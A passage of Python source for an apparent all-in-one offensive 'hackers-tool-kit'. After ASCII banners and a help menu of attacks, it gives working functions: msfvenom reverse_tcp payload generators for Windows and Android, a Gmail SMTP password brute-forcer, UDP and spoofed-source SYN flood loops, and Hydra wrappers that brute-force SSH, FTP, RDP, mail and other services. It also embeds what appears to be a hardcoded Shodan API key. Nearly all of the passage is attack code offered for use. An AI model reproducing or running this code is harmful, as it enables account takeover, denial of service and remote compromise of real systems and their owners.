░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,11) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 